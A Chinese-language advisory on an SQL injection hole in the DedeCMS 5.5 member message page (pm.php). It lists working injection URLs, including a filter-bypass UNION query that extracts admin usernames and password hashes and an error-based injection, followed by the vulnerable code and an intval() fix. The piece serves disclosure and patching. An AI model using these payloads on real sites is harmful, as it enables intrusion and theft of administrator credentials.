1. 漏洞描述
Dedecms会员中心注入漏洞
2. 漏洞触发条件
http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%20%23
如果报错: Safe Alert: Request Error step 1 !
http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2+/*!50000Union*/+/*!50000select*/+1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23
报错注入
http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′ and @' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
3. 漏洞代码分析
/member/pm.php
else if($dopost=='read')
{
$sql = "SELECT * FROM `#@__member_friends` WHERE mid='{$cfg_ml->M_ID}' AND ftype!='-1' ORDER BY addtime DESC LIMIT 20";
$friends = array();
$dsql->SetQuery($sql);
$dsql->Execute();
while ($row = $dsql->GetArray())
{
$friends[] = $row;
}
//$id注入
$row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id='$id' AND (fromid='{$cfg_ml->M_ID}' OR toid='{$cfg_ml->M_ID}')");//ID没过滤
if(!is_array($row))
{
ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');
exit();
}
//$id注入
$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='{$cfg_ml->M_ID}'");
$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder='outbox' AND toid='{$cfg_ml->M_ID}'");
include_once(dirname(__FILE__).'/templets/pm-read.htm');
exit();
}4. 防御方法
/member/pm.php
else if($dopost=='read')
{
$sql = "Select * From `#@__member_friends` where mid='{$cfg_ml->M_ID}' And ftype!='-1' order by addtime desc limit 20";
$friends = array();
$dsql->SetQuery($sql);
$dsql->Execute();
while ($row = $dsql->GetArray())
{
$friends[] = $row;
}
/* $id过滤 */
$id = intval($id);
/* */
$row = $dsql->GetOne("Select * From `#@__member_pms` where id='$id' And (fromid='{$cfg_ml->M_ID}' Or toid='{$cfg_ml->M_ID}')");
if(!is_array($row))
{
ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');
exit();
}
$dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where id='$id' And folder='inbox' And toid='{$cfg_ml->M_ID}'");
$dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where folder='outbox' And toid='{$cfg_ml->M_ID}'");
include_once(dirname(__FILE__).'/templets/pm-read.htm');
exit();
}5.补丁下载:
dedecms_edit.inc.php留言板注入漏洞补丁+pm.php会员中心注入漏洞补丁+mtypes.php会员中心注入漏洞补丁+common.inc.phpSESSION变量覆盖导致SQL注入漏洞补丁+filter.inc.php注入漏洞补丁+select_soft_post.php任意文件上传漏洞补丁.rar
评论回复